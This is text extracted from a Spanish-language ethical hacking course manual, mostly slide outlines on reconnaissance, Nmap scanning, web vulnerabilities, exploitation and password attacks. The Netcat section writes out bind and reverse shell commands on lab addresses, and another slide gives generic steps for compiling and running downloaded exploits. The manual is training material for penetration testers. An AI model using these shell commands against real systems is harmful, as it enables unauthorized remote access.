Material de Ethical Hacking
Material de Ethical Hacking
Material de Ethical Hacking
Ethical Hacking
40 Horas
Todos los nombres propios de programas,
sistemas operativos, equipos hardware,
etc., que aparecen en este manual son
marcas registradas de sus respectivas
compaas u organizaciones.
Ethical Hacking
SYLLABUS
I. DESCRIPCIN
El Ethical Hacking es el proceso por el cual, se utilizan las mismas tcnicas y herramientas
de un atacante malicioso para atacar a una organizacin de una manera controlada; esta
filosofa resulta de la prctica probada: "para atrapar a un ladrn debes pensar como un
ladrn". El objetivo del Ethical Hacking es brindar ayuda a las organizaciones para que
tomen todas las medidas preventivas en contra de agresiones maliciosas, valindose para
ello, de los tests de intrusin, los cuales evalan la seguridad tcnica de los sistemas de
informacin, redes de datos, aplicaciones web, servidores expuestos, etc.
Pre-requisitos:
Conocimientos intermedios de redes
Conocimientos bsicos de programacin
Identificar y describir cmo operan los hackers cuando atacan servidores y clientes,
a travs de Internet.
Realizar una prueba de penetracin.
Utilizar en forma prctica, las herramientas que se utilizan en un proceso de Ethical
Hacking.
Explicar la metodologa OSSTMM desarrollada por ISECOM, para realizar tests de
seguridad.
Describir cmo funcionan los ataques ms comunes que ocurren en Internet y por
consiguiente, cmo protegerse de ellos.
Explicar las ventajas del uso de la tecnologa y los peligros que se pueden generar si
no se tiene implementada una cultura de seguridad.
1
III. METODOLOGA
La metodologa ser expositiva y prctica; apoyada con laboratorios que han sido
diseados para complementar y afianzar el aprendizaje del curso. Los manuales y
diapositivas han sido desarrollados a la medida, y se utilizarn mediante los medios
multimedia, implementados en las aulas. A cada alumno se le asignar una computadora
con el software necesario.
Recursos:
Una computadora personal
Syllabus del curso
Material Educativo del curso
IV. EVALUACIN
2
V. CONTENIDO ANALITICO
Conceptos Bsicos
Historia de los Hackers
Tipos de Ethical Hacking
Etapas del Ethical Hacking
Metodologas de Evaluacin
Laboratorio No. 1:
Cuestionario de Preguntas
Discusin en clase
Introduccin
Consola de Linux
Sistema de Archivos
Instalacin de Software
Laboratorio No. 2:
Instalacin de software utilizando consola
Compilando cdigo C
Interpretando scripts perl, python, bash
Laboratorio No. 3:
Capturando paquetes en la red con Wireshark
Envenenamiento ARP con Etterpcap y arpspoof
3
CAPTULO No. 4: Reconocimiento del Objetivo Duracin: 4 hrs.
Introduccin
Google Hacking
Interrogacin DNS
Herramientas
Laboratorio No. 4:
Buscando informacin sensible con Google.
Herramientas host, dig, whois, SamSpade
Introduccin
Escaneo de Puertos y Enumeracin de Servicios
Nmap
Laboratorio No. 5:
Uso de herramientas de scanning.
RETO: Elevando privilegios en un servidor local.
Introduccin
Analizadores a Nivel Plataforma
Analizadores a Nivel Aplicacin
Laboratorio No. 6:
Reconociendo vulnerabilidades a nivel plataforma con Nessus,NeXpose
Anlisis de Vulnerabilidades a nivel aplicacin.
Introduccin
Vulnerabiliaddes Web
Frameworks de Aprendizaje
Laboratorio No. 7:
Explotando vulnerabilidades Web (RFI, SQLi, LFI)
Atacame (Reto)
4
CAPTULO No. 8: Explotacin de Vulnerabilidades Duracin: 4 hrs.
Laboratorio No. 8:
Explotando vulnerabilidades con Metasploit
Consiguiendo una shell con Netcat
Libros:
Penetration Testing And Network Defense. (2005). Cisco Press. United States of
America
Penetration Tester's Open Source Toolkit. (2007). Syngress. United States of America
The Web Application Hackers Handbook (2009). Wiley Publishing. United States of
America
Hacking Exposed 6th Edition. (2009). McGraw-Hill. United States of America
Google Hacking For Penetration Testers. (2005). Syngress. United States of America
Material Tcnico de Open-Sec.(2009) Per
5
oidiiddhufhahfofhjfhajos
Divisin de Alta Tecnologa
Ethical Hacking
Contenido de Agenda
Conceptos bsicos
Historia de los Hackers
Tipos de Evaluacin
Etapas del Ethical Hacking
Metodologa de Evaluacin
1
Divisin de Alta Tecnologa
Ethical Hacking
2
Divisin de Alta Tecnologa
Ethical Hacking
Manipulacin de Gusanos en
Paquetes / Spoofing Internet
Alto Anlisis Ocultos
DDoS
Sweepers Sofisticacin de las
Back Doors
Sniffers herramientas de los
Explotacin de O-day exploits
atacantes
vulnerabilidades
conocidas Deshabilitar
Programas auditoras
auto
replicados
Password Cracking
Conocimiento
tcnico
Adivinar requerido
Passwords
3
Divisin de Alta Tecnologa
Ethical Hacking
Contenido de Agenda
Conceptos bsicos
Historia de los Hackers
Tipos de Evaluacin
Etapas del Ethical Hacking
Metodologa de Evaluacin
4
Divisin de Alta Tecnologa
Ethical Hacking
a) PDP-1
b) MIT
c) Tech Model Railroad Club
d) ARPANET
a) Laboratorios Bell
b) Multics
c) C
d) USENET
e) Free Software Foundation
f) Linus Torvalds
5
Divisin de Alta Tecnologa
Ethical Hacking
a) Kevin Mitnick
b) Adrian Lamo
c) Tsutomu Shimomura
a) Hackers
b) Crackers
c) Lamers
d) Newbie
e) Phreakers
f) Cyber-Terrorist
6
Divisin de Alta Tecnologa
Ethical Hacking
a) Trazabilidad
b) Autenticidad
c) Activo
d) Amenaza
e) Vulnerabilidad
f) Riesgo
g) Ataque
7
Divisin de Alta Tecnologa
Ethical Hacking
Seguridad de la Informacin
Protege la informacin de un amplio espectro de amenazas, a efectos de
asegurar la continuidad y minimizar los daos a la empresa
maximizando el retorno de inversin.
Seguridad Informtica
Asegura los recursos del sistema de informacin (material informtico o
programas) de la empresa para ser utilizados de la manera en que se
decidi.
8
Divisin de Alta Tecnologa
Ethical Hacking
Contenido de Agenda
Conceptos bsicos
Historia de los Hackers
Tipos de Evaluacin
Etapas del Ethical Hacking
Metodologa de Evaluacin
9
Divisin de Alta Tecnologa
Ethical Hacking
WHITEBOX BLACKBOX
GRAYBOX
10
Divisin de Alta Tecnologa
Ethical Hacking
Contenido de Agenda
Conceptos bsicos
Historia de los Hackers
Tipos de Evaluacin
Etapas del Ethical Hacking
Metodologa de Evaluacin
a) Reconocimiento
b) Scanning
c) Conseguir Acceso
d) Mantener Acceso
e) Borrar Huellas
11
Divisin de Alta Tecnologa
Ethical Hacking
2
1
4
5
3
Contenido de Agenda
Conceptos bsicos
Historia de los Hackers
Tipos de Evaluacin
Etapas del Ethical Hacking
Metodologa de Evaluacin
12
Divisin de Alta Tecnologa
Ethical Hacking
a) Seguridad de la Informacin
b) Seguridad de los Procesos
c) Seguridad en las Tecnologas de Internet
d) Seguridad en las Comunicaciones
e) Seguridad Inalmbrica
f) Seguridad Fsica
13
Divisin de Alta Tecnologa
Ethical Hacking
Laboratorio n 1
Ejercicio 1:
Desarrolle el siguiente laboratorio e intercambie los resultados entre sus
compaeros, lo que le permitir obtener valiosas conclusiones
Tiempo Estimado: 15 minutos
14
Divisin de Alta Tecnologa
Ethical Hacking
Contenido de Agenda
Introduccin
Consola de Linux
Sistema de Archivos
Instalacin del Software
1
Divisin de Alta Tecnologa
Ethical Hacking
PROGRAMAS DE APLICACIN
SISTEMA OPERATIVO
HARDWARE
2
Divisin de Alta Tecnologa
Ethical Hacking
GNU Linux
a) Poderoso y verstil S.O. de licencia libre
b) Ncleo (Linus Torvalds) combinado con sistema GNU
c) Desarrollo de la comunidad
1.4. Distribuciones
a) Ubuntu
b) RedHat
c) Fedora
d) Debian
e) Suse Enterprise
f) OpenSuse
g) Gentoo
3
Divisin de Alta Tecnologa
Ethical Hacking
Contenido de Agenda
Introduccin
Consola de Linux
Sistema de Archivos
Instalacin del Software
2.1. Antecedentes
4
Divisin de Alta Tecnologa
Ethical Hacking
2.1. Antecedentes
5
Divisin de Alta Tecnologa
Ethical Hacking
a) Useradd
b) Userdel
c) Passwd
d) Groups
e) Groupadd
Ejemplo:
a) IFCONFIG eth0 192.168.1.30 netmask 255.255.255.0
b) ROUTE ADD DEFAULT gw 192.168.1.1
c) VI /ETC/RESOLV.CONF
d) NAMESERVER 8.8.8.8
6
Divisin de Alta Tecnologa
Ethical Hacking
Contenido de Agenda
Introduccin
Consola de Linux
Sistema de Archivos
Instalacin del Software
7
Divisin de Alta Tecnologa
Ethical Hacking
8
Divisin de Alta Tecnologa
Ethical Hacking
9
Divisin de Alta Tecnologa
Ethical Hacking
Contenido de Agenda
Introduccin
Consola de Linux
Sistema de Archivos
Instalacin del Software
4.1. Introduccin
10
Divisin de Alta Tecnologa
Ethical Hacking
b) CD fuente
c) ./CONFIGURE
d) MAKE
11
Divisin de Alta Tecnologa
Ethical Hacking
Laboratorio n 2
Ejercicio:
Tiempo: 30 minutos
Desarrolle el siguiente laboratorio e intercambie los resultados entre sus
compaeros, lo que le permitir, obtener valiosas conclusiones
12
Divisin de Alta Tecnologa
Ethical Hacking
Contenido de Agenda
1
Divisin de Alta Tecnologa
Ethical Hacking
1.2. Qu es un Protocolo?
Un protocolo puede ser visto como un lenguaje que utilizan las computadoras
para comunicarse e intercambiar informacin entre s. Los protocolos
permiten que equipos con diferentes arquitecturas o sistemas operativos se
enlacen.
2
Divisin de Alta Tecnologa
Ethical Hacking
3
Divisin de Alta Tecnologa
Ethical Hacking
4
Divisin de Alta Tecnologa
Ethical Hacking
Contenido de Agenda
5
Divisin de Alta Tecnologa
Ethical Hacking
2.1. Definicin
2.2. Wireshark
6
Divisin de Alta Tecnologa
Ethical Hacking
Contenido de Agenda
a) Un switch es un equipo de
conectividad que trabaja en la capa
de enlace similar a un concentrador.
7
Divisin de Alta Tecnologa
Ethical Hacking
8
Divisin de Alta Tecnologa
Ethical Hacking
9
Divisin de Alta Tecnologa
Ethical Hacking
Contenido de Agenda
4.1. Introduccin
Un ataque de denegacin de
servicio, tambin llamado DoS
(Denial of Service) es un ataque a
un sistema de computadoras o red,
que causa que un servicio o recurso
sea inaccesible a los usuarios
legtimos.
10
Divisin de Alta Tecnologa
Ethical Hacking
11
Divisin de Alta Tecnologa
Ethical Hacking
Syn Flood
ICMP Flood
12
Divisin de Alta Tecnologa
Ethical Hacking
SMURF
TEARDROP
13
Divisin de Alta Tecnologa
Ethical Hacking
Contenido de Agenda
5.1. Definicin
14
Divisin de Alta Tecnologa
Ethical Hacking
a) Troyano
b) Virus
c) Bomba Lgica
d) Botnet
e) Gusano
f) Keylogger
g) Stealer
h) Rootkit
i) Adware
j) Spyware
k) Backdoor
15
Divisin de Alta Tecnologa
Ethical Hacking
Laboratorio n 3
Ejercicio:
Tiempo: 60 minutos
Desarrolle el siguiente laboratorio e intercambie los resultados entre sus
compaeros, lo que le permitir, obtener valiosas conclusiones
16
Divisin de Alta Tecnologa
Ethical Hacking
Contenido de Agenda
Introduccin
Google Hacking
Interrogacin DNS
Herramientas
1
Divisin de Alta Tecnologa
Ethical Hacking
1.1. Antecedentes
1.1. Antecedentes
2
Divisin de Alta Tecnologa
Ethical Hacking
a) Nombres de dominio
b) Direcciones IP
c) Informacin de registro (IP, Dominio)
d) Rangos de red
e) Proveedor de Internet
f) Tecnologas utilizadas
g) Arquitectura de Red
h) Informacin relevante
Contenido de Agenda
Introduccin
Google Hacking
Interrogacin DNS
Herramientas
3
Divisin de Alta Tecnologa
Ethical Hacking
4
Divisin de Alta Tecnologa
Ethical Hacking
b) Logs de aplicaciones
ws_ftp filetype:log access
filetype:log
Contenido de Agenda
Introduccin
Google Hacking
Interrogacin DNS
Herramientas
5
Divisin de Alta Tecnologa
Ethical Hacking
6
Divisin de Alta Tecnologa
Ethical Hacking
Consola
a) Whois
b) Dig.
c) Host
Web
a) RIR
b) Netcraft (www.netcraft.com)
c) Clez (www.clez.net)
Contenido de Agenda
Introduccin
Google Hacking
Interrogacin DNS
Herramientas
7
Divisin de Alta Tecnologa
Ethical Hacking
4.1. Introduccin
8
Divisin de Alta Tecnologa
Ethical Hacking
Laboratorio n 4
Ejercicio:
Tiempo: 60 minutos
Desarrolle el siguiente laboratorio e intercambie los resultados entre sus
compaeros, lo que le permitir obtener valiosas conclusiones.
9
oidiiddhufhahfofhjfhajos
Divisin de Alta Tecnologa
Ethical Hacking
Contenido de Agenda
Introduccin
Escaneo y Enumeracin
Nmap
1
Divisin de Alta Tecnologa
Ethical Hacking
1.1. Antecedentes
Contenido de Agenda
Introduccin
Escaneo y Enumeracin
Nmap
2
Divisin de Alta Tecnologa
Ethical Hacking
Direccin IP
Puerto
3
Divisin de Alta Tecnologa
Ethical Hacking
Socket
Socket
4
Divisin de Alta Tecnologa
Ethical Hacking
Conexin TCP
Ping Sweep
5
Divisin de Alta Tecnologa
Ethical Hacking
TCP Connect
SYN Scan
6
Divisin de Alta Tecnologa
Ethical Hacking
SYN Scan
NULL Scan
Este escaneo se basa en enviar un paquete malformado con todos los flags
TCP desactivados y esperar la respuesta. Segn el RFC 793, si un sistema
recibe un paquete hacia un puerto cerrado TCP, sin ningn flag activo,
deber responder con un RST.
7
Divisin de Alta Tecnologa
Ethical Hacking
XMAS Scan
FIN Scan
8
Divisin de Alta Tecnologa
Ethical Hacking
UPD Scan
9
Divisin de Alta Tecnologa
Ethical Hacking
10
Divisin de Alta Tecnologa
Ethical Hacking
Contenido de Agenda
Introduccin
Escaneo y Enumeracin
Nmap
11
Divisin de Alta Tecnologa
Ethical Hacking
3.1. Definicin
12
Divisin de Alta Tecnologa
Ethical Hacking
a) paranoid (0)
Evasin IDS, serializado, 5 minutos de gap
b) sneaky (1)
15 segundos de gap
c) polite (2)
0.4 segundos de gap
d) normal (3)
verificaciones en paralelo
e) aggressive (4)
10 milisegundos de gap
f) insane (5)
5 milisegundos de gap
13
Divisin de Alta Tecnologa
Ethical Hacking
Laboratorio n 5
Ejercicio:
Tiempo: 90 minutos
Desarrolle el siguiente laboratorio e intercambie los resultados entre sus
compaeros, lo que le permitir obtener valiosas conclusiones.
14
Divisin de Alta Tecnologa
Ethical Hacking
Contenido de Agenda
Introduccin
Analizadores a Nivel Plataforma
Analizadores a Nivel Aplicacin
1
Divisin de Alta Tecnologa
Ethical Hacking
2
Divisin de Alta Tecnologa
Ethical Hacking
3
Divisin de Alta Tecnologa
Ethical Hacking
Contenido de Agenda
Introduccin
Analizadores a Nivel Plataforma
Analizadores a Nivel Aplicacin
4
Divisin de Alta Tecnologa
Ethical Hacking
5
Divisin de Alta Tecnologa
Ethical Hacking
Contenido de Agenda
Introduccin
Analizadores a Nivel Plataforma
Analizadores a Nivel Aplicacin
6
Divisin de Alta Tecnologa
Ethical Hacking
7
Divisin de Alta Tecnologa
Ethical Hacking
Laboratorio n 6
Ejercicio:
Tiempo: 60 minutos
Desarrolle el siguiente laboratorio e intercambie los resultados entre sus
compaeros, lo que le permitir obtener valiosas conclusiones.
8
Divisin de Alta Tecnologa
Ethical Hacking
Contenido de Agenda
Introduccin
Vulnerabilidades Web
Frameworks de Aprendizaje
1
Divisin de Alta Tecnologa
Ethical Hacking
2
Divisin de Alta Tecnologa
Ethical Hacking
Contenido de Agenda
Introduccin
Vulnerabilidades Web
Frameworks de Aprendizaje
2.1. Antecedentes
3
Divisin de Alta Tecnologa
Ethical Hacking
2.1. Antecedentes
2.1. Antecedentes
http://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project
4
Divisin de Alta Tecnologa
Ethical Hacking
Inyeccin SQL
Inyeccin SQL
5
Divisin de Alta Tecnologa
Ethical Hacking
http://www.xssed.org/
6
Divisin de Alta Tecnologa
Ethical Hacking
7
Divisin de Alta Tecnologa
Ethical Hacking
Contenido de Agenda
Introduccin
Vulnerabilidades Web
Frameworks de Aprendizaje
3.1. WebGoat
8
Divisin de Alta Tecnologa
Ethical Hacking
Permite entrenamiento en seguridad Web en SQL Injection, XSS (Cross Site Scripting), LFI
(Local File Inclusion), RFI (Remote File Inclusion), Command Execution, Upload Script y Login
Brute Force.
Laboratorio n 7
Ejercicio:
Tiempo: 60 minutos
Desarrolle el siguiente laboratorio e intercambie los resultados entre sus
compaeros, lo que le permitir obtener valiosas conclusiones.
9
oidiiddhufhahfofhjfhajos
Divisin de Alta Tecnologa
Ethical Hacking
Contenido de Agenda
1
Divisin de Alta Tecnologa
Ethical Hacking
1.1. Introduccin
1.2. Securityfocus.com
2
Divisin de Alta Tecnologa
Ethical Hacking
1.3. Exploit-db.com
1.4. Packetstormsecurity.org
3
Divisin de Alta Tecnologa
Ethical Hacking
extensin: .pl
Extensin: .c, .cc perl exploit.pl parmetros
gcc exploit.c -o binario
./binario parmetros
Extensin: .php
php exploit.php parmetros
Extensin: .py
python exploit.py parmetros
Extensin: .rb
ruby exploit.rb parmetros
Contenido de Agenda
4
Divisin de Alta Tecnologa
Ethical Hacking
2.1. Introduccin
5
Divisin de Alta Tecnologa
Ethical Hacking
6
Divisin de Alta Tecnologa
Ethical Hacking
Contenido de Agenda
3.1. Introduccin
7
Divisin de Alta Tecnologa
Ethical Hacking
8
Divisin de Alta Tecnologa
Ethical Hacking
Mquina A:
a) Windows: nc -lvvp 4444 -e cmd.exe
b) Linux: nc -lvvp 444 -e /bin/bash
Mquina B:
a) nc -v 192.168.1.1 4444
9
Divisin de Alta Tecnologa
Ethical Hacking
Mquina B:
a) nc -lvvp 4444
Mquina A:
a) Windows: nc -v 192.168.1.1
4444 -e cmd.exe
b) Linux: nc -v 192.168.1.1 4444 -
e /bin/bash
Contenido de Agenda
10
Divisin de Alta Tecnologa
Ethical Hacking
4.1. Introduccin
Password
Ataque
Guessing Password Sniffing
Hbrido
11
Divisin de Alta Tecnologa
Ethical Hacking
4.3. Herramientas
Cain &
Abel
Laboratorio n 8
Ejercicio:
Tiempo: 60 minutos
Desarrolle el siguiente laboratorio e intercambie los resultados entre sus
compaeros, lo que le permitir obtener valiosas conclusiones.
12